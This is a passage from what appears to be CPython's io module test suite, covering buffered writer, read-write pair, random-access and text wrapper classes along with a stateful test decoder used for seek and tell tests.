bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data.tobytes(), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
      When I is set to 0, words are variable-length and period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
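    # An incremental decoder's getstate() must return (buffered_input, flags)
    # with an integer flags value, so i and o are packed into a single number;
    # TextIOWrapper.tell() embeds this state in its opaque seek cookies.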
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
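# The registration above is inert until a test sets codecEnabled to a true
# value; test_seek_and_tell below does so and then opens files with
# encoding='test_decoder'.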
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), u'')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with support.check_py3k_warnings():
self.TextIOWrapper(b, encoding="hex_codec")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
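        # Each entry pairs a newline argument for TextIOWrapper with the lines
        # expected from input_lines: None enables universal-newline
        # translation, '' disables translation entirely.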
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
